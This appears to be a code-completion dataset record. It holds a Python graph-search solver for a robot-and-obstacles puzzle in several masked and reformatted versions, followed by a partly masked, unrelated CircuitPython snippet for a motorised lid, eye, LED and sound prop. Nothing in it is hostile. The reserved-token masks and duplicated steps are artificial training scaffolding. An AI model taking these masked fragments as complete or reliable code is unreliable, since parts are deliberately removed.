moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
elif neighbor != r:
nh = find_nearest_hole(o, r, graph, neighbor)
if len(nh) > 0:
moves.extend(find_nearest_hole(o, r, graph, neighbor))
return moves
def possible_obstacles_moves(o, r, graph):
moves = []
for obstacle in o:
moves.extend(possible_obstacle_moves(o, r, graph, obstacle))
return moves
def possible_moves(o, r, graph):
moves = []
moves.extend(possible_robot_moves(o, r, graph))
moves.extend(possible_obstacles_moves(o, r, graph))
return moves
def color(o, r, graph, node, target, start):
if node in o and node == target:
return 'c'
if node in o:
return 'r'
if node == r:
return 'b'
if node == start:
return 'y'
if node == target:
return 'g'
return 'w'
def create_state(o, r):
o.sort()
return '-'.join(o) + ' ___ R = ' + r
def fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):
shortest = nx.shortest_path(graph, robot, target)
score = -len(shortest) - num_of_moves
for obstacle in obstacles:
if obstacle in shortest:
score = score - 1
return -score
def solve_heap(o, r, graph, t):
round = 0
visited = set([])
queue = [(-1000, [], o, r)]
while queue:
score, moves, obstacles, robot = heap.heappop(queue)
obstacles.sort()
st = '#'.join(obstacles), robot
if st not in visited:
visited.add(st)
score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))
pm = possible_moves(obstacles, robot, graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles, newrobot = make_moves(obstacles, robot, graph,
[move])
if t == newrobot:
print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
return new_moves
round = round + 1
if round % 100000 == 0:
print('Visited = ' + str(len(visited)))
heap.heappush(queue, (score, new_moves, newobstacles, newrobot)
)
def solve_brute_force(o, r, graph, t):
num_of_solutions = 0
all_solutions = []
round = 0
visited = set([])
queue = [([], o, r)]
while queue:
moves, obstacles, robot = queue.pop(0)
obstacles.sort()
st = '#'.join(obstacles), robot
if st not in visited:
visited.add(st)
pm = possible_moves(obstacles, robot, graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles, newrobot = make_moves(obstacles, robot, graph,
[move])
if t == newrobot:
all_solutions.append(new_moves)
round = round + 1
if round % 100000 == 0:
print('Visited = ' + str(len(visited)))
queue.append((new_moves, newobstacles, newrobot))
print('Number of solutions: ' + str(len(all_solutions)))
best = min(all_solutions, key=lambda x: len(x))
return best
<|reserved_special_token_1|>
import heapq as heap
import networkx as nx
import copy
import random
def remove_jumps(moves):
res = []
for move in moves:
if move[2] > 1:
move[3].reverse()
res.extend(make_moves_from_path(move[3]))
else:
res.append(move)
return res
def make_moves_from_path(path):
moves = []
p = path[:]
for i in range(len(p)-1):
moves.append((p[i+1], p[i], 1, [p[i+1], p[i]]))
return moves
def find_nearest_hole(o,r,graph, start):
visited, queue = [], [(start, [start])]
results = []
while queue:
(node, search_path) = queue.pop(0)
if node not in visited:
visited.append(node)
adjacent = graph.adj[node]
for neighbor in adjacent:
if neighbor in o:
if neighbor not in visited:
queue.append((neighbor, search_path + [neighbor]))
else:
if neighbor != r:
results.append(search_path + [neighbor])
moves = []
for res in results:
moves.append((res[0], res[-1], len(res)-1, res))
return moves
def move_robot(o,r,graph,node_from,node_to):
obstacles = o[:]
robot = r
if not node_from == r:
raise RuntimeError('node_from is not robot ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
robot = node_to
return (obstacles,robot)
def move_obstacle(o,r,graph,node_from,node_to):
obstacles = o[:]
robot = r
if node_from not in obstacles:
raise RuntimeError('node_from is not obstacle ' + node_from)
if node_to in obstacles:
raise RuntimeError('node_to is obstacle ' + node_to)
if node_to == robot:
raise RuntimeError('node_to is robot' + node_to)
obstacles.append(node_to)
obstacles.remove(node_from)
return(obstacles,robot)
def make_move(o,r,graph,node_from,node_to):
if node_from == None:
return (o, r)
if( r == node_from):
return move_robot(o,r,graph,node_from,node_to)
if ( node_from in o):
return move_obstacle(o,r,graph,node_from,node_to)
raise RuntimeError('Cant move from ' + node_from)
def make_moves(o,r,graph,moves):
obstacles= o[:]
robot = r
for move in moves:
obstacles,robot = make_move(obstacles,robot,graph,move[0],move[1])
return (obstacles,robot)
def is_hole(o, r, node):
if (node not in o):
return True
return False
def possible_robot_moves(o, r, graph):
moves=[]
robot_node = r
robot_neighbors = graph.adj[r]
for neighbor in robot_neighbors:
if is_hole(o,r,neighbor):
moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))
return moves
def possible_obstacle_moves(o,r,graph,obstacle):
obstacle_neighbors = graph.adj[obstacle]
moves = []
for neighbor in obstacle_neighbors:
if is_hole(o,r,neighbor) and neighbor != r:
moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))
else:
if neighbor != r:
nh = find_nearest_hole(o, r, graph, neighbor)
if len(nh) > 0:
moves.extend(find_nearest_hole(o,r,graph, neighbor))
return moves
def possible_obstacles_moves(o,r,graph):
moves = []
for obstacle in o:
moves.extend(possible_obstacle_moves(o,r,graph,obstacle))
return moves
def possible_moves(o,r,graph):
moves = []
moves.extend(possible_robot_moves(o,r,graph))
moves.extend(possible_obstacles_moves(o,r,graph))
return moves
def color(o,r,graph,node,target,start):
if (node in o and node == target):
return 'c'
if node in o:
return 'r'
if node == r:
return 'b'
if node == start:
return 'y'
if node == target:
return 'g'
return 'w'
def create_state(o, r):
o.sort()
return '-'.join(o) + ' ___ R = ' + r
#__________________________________________________________________________________
def fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):
shortest = nx.shortest_path(graph,robot,target)
score = -len(shortest) - num_of_moves
for obstacle in obstacles:
if obstacle in shortest:
score = score - 1
return -score
def solve_heap(o,r,graph,t):
round = 0
visited = set([])
queue= [(-1000,[],o,r)]
while queue:
score,moves,obstacles,robot = heap.heappop(queue)
obstacles.sort()
st = ('#'.join(obstacles),robot)
if ( st not in visited ):
visited.add(st)
score = fitness_fun_heap(graph,obstacles,robot,t,len(moves))
pm = possible_moves(obstacles,robot,graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles,newrobot = make_moves(obstacles,robot,graph,[move])
if t == newrobot:
print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
return new_moves
round = round+1
if (round % 100000 == 0):
print ("Visited = " + str(len(visited)))
heap.heappush(queue,(score,new_moves,newobstacles,newrobot))
def solve_brute_force(o,r,graph,t):
num_of_solutions = 0
all_solutions = []
round = 0
visited = set([])
queue = [([],o,r)]
while queue:
moves,obstacles,robot = queue.pop(0)
obstacles.sort()
st = ('#'.join(obstacles),robot)
if ( st not in visited ):
visited.add(st)
pm = possible_moves(obstacles,robot,graph)
for move in pm:
new_moves = moves[:]
new_moves.append(move)
newobstacles,newrobot = make_moves(obstacles,robot,graph,[move])
if t == newrobot:
all_solutions.append(new_moves)
round = round+1
if (round % 100000 == 0):
print ("Visited = " + str(len(visited)))
queue.append((new_moves,newobstacles,newrobot))
print('Number of solutions: ' + str(len(all_solutions)))
best = min(all_solutions, key = lambda x : len(x))
return best
|
flexible
|
{
"blob_id": "800edfc61635564abf8297c4f33c59d48cc99960",
"index": 4058,
"step-1": "<mask token>\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\n<mask token>\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\n<mask token>\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\n<mask token>\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef remove_jumps(moves):\n res = []\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n return res\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\ndef move_obstacle(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n obstacles.append(node_to)\n obstacles.remove(node_from)\n return obstacles, robot\n\n\n<mask token>\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\n<mask token>\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\ndef color(o, r, graph, node, target, start):\n if node in o and node == target:\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\n<mask token>\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\ndef solve_brute_force(o, r, graph, t):\n num_of_solutions = 0\n all_solutions = []\n round = 0\n visited = set([])\n queue = [([], o, r)]\n while queue:\n moves, obstacles, robot = queue.pop(0)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n all_solutions.append(new_moves)\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n queue.append((new_moves, newobstacles, newrobot))\n print('Number of solutions: ' + str(len(all_solutions)))\n best = min(all_solutions, key=lambda x: len(x))\n return best\n",
"step-3": "<mask token>\n\n\ndef remove_jumps(moves):\n res = []\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n return res\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\ndef move_obstacle(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n obstacles.append(node_to)\n obstacles.remove(node_from)\n return obstacles, robot\n\n\n<mask token>\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\n<mask token>\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\ndef color(o, r, graph, node, target, start):\n if node in o and node == target:\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\n<mask token>\n\n\ndef fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):\n shortest = nx.shortest_path(graph, robot, target)\n score = -len(shortest) - num_of_moves\n for obstacle in obstacles:\n if obstacle in shortest:\n score = score - 1\n return -score\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\ndef solve_brute_force(o, r, graph, t):\n num_of_solutions = 0\n all_solutions = []\n round = 0\n visited = set([])\n queue = [([], o, r)]\n while queue:\n moves, obstacles, robot = queue.pop(0)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n all_solutions.append(new_moves)\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n queue.append((new_moves, newobstacles, newrobot))\n print('Number of solutions: ' + str(len(all_solutions)))\n best = min(all_solutions, key=lambda x: len(x))\n return best\n",
"step-4": "<mask token>\n\n\ndef remove_jumps(moves):\n res = []\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n return res\n\n\ndef make_moves_from_path(path):\n moves = []\n p = path[:]\n for i in range(len(p) - 1):\n moves.append((p[i + 1], p[i], 1, [p[i + 1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o, r, graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n while queue:\n node, search_path = queue.pop(0)\n if node not in visited:\n visited.append(node)\n adjacent = graph.adj[node]\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n elif neighbor != r:\n results.append(search_path + [neighbor])\n moves = []\n for res in results:\n moves.append((res[0], res[-1], len(res) - 1, res))\n return moves\n\n\ndef move_robot(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return obstacles, robot\n\n\ndef move_obstacle(o, r, graph, node_from, node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n obstacles.append(node_to)\n obstacles.remove(node_from)\n return obstacles, robot\n\n\ndef make_move(o, r, graph, node_from, node_to):\n if node_from == None:\n return o, r\n if r == node_from:\n return move_robot(o, r, graph, node_from, node_to)\n if node_from in o:\n return move_obstacle(o, r, graph, node_from, node_to)\n raise RuntimeError('Cant move from ' + node_from)\n\n\n<mask token>\n\n\ndef is_hole(o, r, node):\n if node not in o:\n return True\n return False\n\n\ndef possible_robot_moves(o, r, graph):\n moves = []\n robot_node = r\n robot_neighbors = graph.adj[r]\n for neighbor in robot_neighbors:\n if is_hole(o, r, neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\n\ndef possible_obstacle_moves(o, r, graph, obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n for neighbor in obstacle_neighbors:\n if is_hole(o, r, neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n elif neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o, r, graph, neighbor))\n return moves\n\n\ndef possible_obstacles_moves(o, r, graph):\n moves = []\n for obstacle in o:\n moves.extend(possible_obstacle_moves(o, r, graph, obstacle))\n return moves\n\n\ndef possible_moves(o, r, graph):\n moves = []\n moves.extend(possible_robot_moves(o, r, graph))\n moves.extend(possible_obstacles_moves(o, r, graph))\n return moves\n\n\ndef color(o, r, graph, node, target, start):\n if node in o and node == target:\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\ndef create_state(o, r):\n o.sort()\n return '-'.join(o) + ' ___ R = ' + r\n\n\ndef fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):\n shortest = nx.shortest_path(graph, robot, target)\n score = -len(shortest) - num_of_moves\n for obstacle in obstacles:\n if obstacle in shortest:\n score = score - 1\n return -score\n\n\ndef solve_heap(o, r, graph, t):\n round = 0\n visited = set([])\n queue = [(-1000, [], o, r)]\n while queue:\n score, moves, obstacles, robot = heap.heappop(queue)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n score = fitness_fun_heap(graph, obstacles, robot, t, len(moves))\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return new_moves\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n heap.heappush(queue, (score, new_moves, newobstacles, newrobot)\n )\n\n\ndef solve_brute_force(o, r, graph, t):\n num_of_solutions = 0\n all_solutions = []\n round = 0\n visited = set([])\n queue = [([], o, r)]\n while queue:\n moves, obstacles, robot = queue.pop(0)\n obstacles.sort()\n st = '#'.join(obstacles), robot\n if st not in visited:\n visited.add(st)\n pm = possible_moves(obstacles, robot, graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles, newrobot = make_moves(obstacles, robot, graph,\n [move])\n if t == newrobot:\n all_solutions.append(new_moves)\n round = round + 1\n if round % 100000 == 0:\n print('Visited = ' + str(len(visited)))\n queue.append((new_moves, newobstacles, newrobot))\n print('Number of solutions: ' + str(len(all_solutions)))\n best = min(all_solutions, key=lambda x: len(x))\n return best\n",
"step-5": "import heapq as heap\nimport networkx as nx\nimport copy\nimport random\ndef remove_jumps(moves):\n\n res = []\n\n for move in moves:\n if move[2] > 1:\n move[3].reverse()\n res.extend(make_moves_from_path(move[3]))\n else:\n res.append(move)\n\n return res\n\n\ndef make_moves_from_path(path):\n\n moves = []\n p = path[:]\n\n for i in range(len(p)-1):\n moves.append((p[i+1], p[i], 1, [p[i+1], p[i]]))\n return moves\n\n\ndef find_nearest_hole(o,r,graph, start):\n visited, queue = [], [(start, [start])]\n results = []\n\n while queue:\n (node, search_path) = queue.pop(0)\n\n if node not in visited:\n visited.append(node)\n\n adjacent = graph.adj[node]\n\n for neighbor in adjacent:\n if neighbor in o:\n if neighbor not in visited:\n queue.append((neighbor, search_path + [neighbor]))\n else:\n if neighbor != r:\n results.append(search_path + [neighbor])\n\n moves = []\n for res in results:\n\n moves.append((res[0], res[-1], len(res)-1, res))\n return moves\n\ndef move_robot(o,r,graph,node_from,node_to):\n obstacles = o[:]\n robot = r\n if not node_from == r:\n raise RuntimeError('node_from is not robot ' + node_from)\n\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n robot = node_to\n return (obstacles,robot)\n\ndef move_obstacle(o,r,graph,node_from,node_to):\n obstacles = o[:]\n robot = r\n if node_from not in obstacles:\n raise RuntimeError('node_from is not obstacle ' + node_from)\n if node_to in obstacles:\n raise RuntimeError('node_to is obstacle ' + node_to)\n\n if node_to == robot:\n raise RuntimeError('node_to is robot' + node_to)\n\n obstacles.append(node_to)\n obstacles.remove(node_from)\n\n return(obstacles,robot)\n\ndef make_move(o,r,graph,node_from,node_to):\n\n if node_from == None:\n return (o, r)\n\n if( r == node_from):\n return move_robot(o,r,graph,node_from,node_to)\n if ( node_from in o):\n return move_obstacle(o,r,graph,node_from,node_to)\n\n raise RuntimeError('Cant move from ' + node_from)\n\ndef make_moves(o,r,graph,moves):\n obstacles= o[:]\n robot = r\n for move in moves:\n obstacles,robot = make_move(obstacles,robot,graph,move[0],move[1])\n return (obstacles,robot)\n\ndef is_hole(o, r, node):\n if (node not in o):\n return True\n return False\n\ndef possible_robot_moves(o, r, graph):\n moves=[]\n robot_node = r\n robot_neighbors = graph.adj[r]\n\n for neighbor in robot_neighbors:\n if is_hole(o,r,neighbor):\n moves.append((robot_node, neighbor, 1, [robot_node, neighbor]))\n return moves\n\ndef possible_obstacle_moves(o,r,graph,obstacle):\n obstacle_neighbors = graph.adj[obstacle]\n moves = []\n\n for neighbor in obstacle_neighbors:\n if is_hole(o,r,neighbor) and neighbor != r:\n moves.append((obstacle, neighbor, 1, [obstacle, neighbor]))\n else:\n if neighbor != r:\n nh = find_nearest_hole(o, r, graph, neighbor)\n if len(nh) > 0:\n moves.extend(find_nearest_hole(o,r,graph, neighbor))\n\n return moves\n\ndef possible_obstacles_moves(o,r,graph):\n moves = []\n for obstacle in o:\n moves.extend(possible_obstacle_moves(o,r,graph,obstacle))\n return moves\n\ndef possible_moves(o,r,graph):\n moves = []\n moves.extend(possible_robot_moves(o,r,graph))\n moves.extend(possible_obstacles_moves(o,r,graph))\n return moves\n\n\ndef color(o,r,graph,node,target,start):\n if (node in o and node == target):\n return 'c'\n if node in o:\n return 'r'\n if node == r:\n return 'b'\n if node == start:\n return 'y'\n if node == target:\n return 'g'\n return 'w'\n\n\ndef create_state(o, r):\n\n o.sort()\n return '-'.join(o) + ' ___ R = ' + r\n\n#__________________________________________________________________________________\n\ndef fitness_fun_heap(graph, obstacles, robot, target, num_of_moves):\n shortest = nx.shortest_path(graph,robot,target)\n score = -len(shortest) - num_of_moves\n\n for obstacle in obstacles:\n if obstacle in shortest:\n score = score - 1\n\n return -score\n\n\n\ndef solve_heap(o,r,graph,t):\n round = 0\n visited = set([])\n queue= [(-1000,[],o,r)]\n while queue:\n score,moves,obstacles,robot = heap.heappop(queue)\n obstacles.sort()\n st = ('#'.join(obstacles),robot)\n if ( st not in visited ):\n visited.add(st)\n score = fitness_fun_heap(graph,obstacles,robot,t,len(moves))\n pm = possible_moves(obstacles,robot,graph)\n\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles,newrobot = make_moves(obstacles,robot,graph,[move])\n if t == newrobot:\n print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n return new_moves\n\n round = round+1\n if (round % 100000 == 0):\n print (\"Visited = \" + str(len(visited)))\n heap.heappush(queue,(score,new_moves,newobstacles,newrobot))\n\n\n\n\n\ndef solve_brute_force(o,r,graph,t):\n num_of_solutions = 0\n all_solutions = []\n\n round = 0\n visited = set([])\n queue = [([],o,r)]\n while queue:\n moves,obstacles,robot = queue.pop(0)\n obstacles.sort()\n st = ('#'.join(obstacles),robot)\n if ( st not in visited ):\n visited.add(st)\n\n pm = possible_moves(obstacles,robot,graph)\n for move in pm:\n new_moves = moves[:]\n new_moves.append(move)\n newobstacles,newrobot = make_moves(obstacles,robot,graph,[move])\n if t == newrobot:\n all_solutions.append(new_moves)\n\n round = round+1\n\n if (round % 100000 == 0):\n print (\"Visited = \" + str(len(visited)))\n queue.append((new_moves,newobstacles,newrobot))\n\n\n print('Number of solutions: ' + str(len(all_solutions)))\n\n best = min(all_solutions, key = lambda x : len(x))\n\n return best\n",
"step-ids": [
7,
11,
12,
16,
19
]
}
|
[
7,
11,
12,
16,
19
] |
<|reserved_special_token_0|>
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ss.pin_mode(button, ss.INPUT_PULLUP)
<|reserved_special_token_0|>
ss.pin_mode(LED, ss.OUTPUT)
<|reserved_special_token_0|>
ss.pin_mode(attract_switch, ss.INPUT_PULLUP)
<|reserved_special_token_0|>
def open_lid():
motor_lid.throttle = 1
time.sleep(0.25)
motor_lid.throttle = 0
def close_lid():
motor_lid.throttle = -1
time.sleep(0.25)
motor_lid.throttle = 0
def blink(times):
for _ in range(times):
ss.digital_write(LED, True)
time.sleep(0.1)
ss.digital_write(LED, False)
time.sleep(0.1)
def eye_look():
motor_eye.throttle = random.uniform(0.6, 1.0)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
motor_eye.throttle = random.uniform(-1.0, -0.6)
time.sleep(random.random())
motor_eye.throttle = 0
time.sleep(random.random())
while True:
if ss.digital_read(attract_switch):
if not ss.digital_read(button):
decoder = audiomp3.MP3Decoder(open('ring.mp3', 'rb'))
audio.play(decoder)
while audio.playing:
pass
open_lid()
blink(3)
ss.digital_write(LED, True)
